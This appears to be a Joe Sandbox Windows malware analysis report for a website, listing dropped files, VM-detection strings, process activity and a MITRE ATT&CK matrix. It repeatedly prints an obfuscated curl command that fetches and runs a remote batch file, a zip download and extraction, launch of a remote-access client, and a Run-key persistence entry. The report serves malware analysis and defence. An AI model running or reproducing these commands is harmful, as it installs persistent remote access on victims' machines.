Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\libopus-0.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\hw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\libopus-0.dll	Jump to dropped file

Source: C:\Windows\System32\osk.exe TID: 7172	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe TID: 3276	Thread sleep time: -137250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe TID: 3276	Thread sleep time: -2276000s >= -30000s

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000014.00000000.1326758086.0000000002A20000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42efC
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt_@
Source: explorer.exe, 00000014.00000003.2018164212.000000001031B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: TCCTL32.DLL.31.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008393000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000000.00000003.1775422383.0000742403BB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: explorer.exe, 00000014.00000003.2021431230.000000000841F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}icense-Show
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000014.00000003.1920742592.00000000083B8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTnaVMWare
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: curl.exe, 0000001B.00000003.1453761095.000001D085104000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1475957554.0000020082825000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000014.00000000.1337084127.00000000081F1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWUSm32\DriverStore\en-GB\mshdc.inf_loc
Source: explorer.exe, 00000014.00000003.2021431230.0000000008432000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00%
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: osk.exe, 00000013.00000003.2248404527.000002ED5F2A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmcI
Source: TCCTL32.DLL.31.dr	Binary or memory string: VMWare
Source: explorer.exe, 00000014.00000003.2018164212.000000001031B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@#
Source: explorer.exe, 00000014.00000000.1345005602.000000000BFE4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000014.00000000.1327863404.0000000006BE8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000CJ
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000S
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000014.00000003.2021431230.000000000841F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Dire\client32.exe "C:\Users\user\AppData\Roaming\Dire\client32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat

Source: PCICL32.DLL.31.dr	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000014.00000003.2021431230.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2039234356.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.0000000008519000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp, PCICL32.DLL.31.dr	Binary or memory string: Progman
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanH9

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming\gety.zip VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Dire VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Dire VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Dire VolumeInformation
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: Yara match	File source: 32.0.client32.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000000.1486224969.00000000007CF000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\client32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Windows Management Instrumentation	3 Browser Extensions	12 Process Injection	1 Masquerading	1 Credential API Hooking	111 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Scripting	1 Registry Run Keys / Startup Folder	1 Modify Registry	111 Input Capture	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	111 Input Capture	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	Login Hook	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	31 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://fountainofhealth.ca

Overview

General Information

Detection

Signatures

Classification

Process Tree

AI Reasoning

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

HTML

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
http://fountainofhealth.ca